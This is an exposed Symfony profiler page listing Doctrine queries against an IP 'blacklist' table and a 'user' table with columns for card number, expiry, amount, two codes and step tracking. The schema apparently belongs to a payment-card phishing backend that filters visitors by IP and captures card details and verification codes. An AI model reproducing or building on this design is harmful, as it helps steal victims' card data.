Query Metrics
5
Database Queries
5
Different statements
5.78 ms
Query time
0
Invalid entities
Grouped Statements
Time▼ | Count | Info |
---|---|---|
2.83 ms (48.89%) |
1 |
SELECT t0.id AS id_1, t0.ip AS ip_2, t0.url AS url_3 FROM blacklist t0 WHERE t0.ip = ? LIMIT 1
Parameters:
[
"216.73.216.15"
]
|
1.11 ms (19.13%) |
1 |
SELECT t0.id AS id_1, t0.numero_card AS numero_card_2, t0.month AS month_3, t0.year AS year_4, t0.step AS step_5, t0.now_step AS now_step_6, t0.ip AS ip_7, t0.montant AS montant_8, t0.code AS code_9, t0.code2 AS code2_10, t0.text AS text_11, t0.date AS date_12, t0.datetime AS datetime_13, t0.type AS type_14, t0.is_showing AS is_showing_15 FROM user t0 WHERE t0.ip = ? LIMIT 1
Parameters:
[
"216.73.216.15"
]
|
0.78 ms (13.50%) |
1 |
"COMMIT"
Parameters:
[] |
0.76 ms (13.16%) |
1 |
INSERT INTO user (numero_card, month, year, step, now_step, ip, montant, code, code2, text, date, datetime, type, is_showing) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)
Parameters:
[ 1 => null 2 => null 3 => null 4 => "" 5 => "home" 6 => "216.73.216.15" 7 => null 8 => null 9 => null 10 => null 11 => null 12 => null 13 => null 14 => 0 ] |
0.31 ms (5.31%) |
1 |
"START TRANSACTION"
Parameters:
[] |
Database Connections
Name | Service |
---|---|
default | doctrine.dbal.default_connection |
Entity Managers
Name | Service |
---|---|
default | doctrine.orm.default_entity_manager |
Second Level Cache
Second Level Cache is not enabled.
Entities Mapping
Class | Mapping errors |
---|---|
App\Entity\Blacklist | No errors. |
App\Entity\User | No errors. |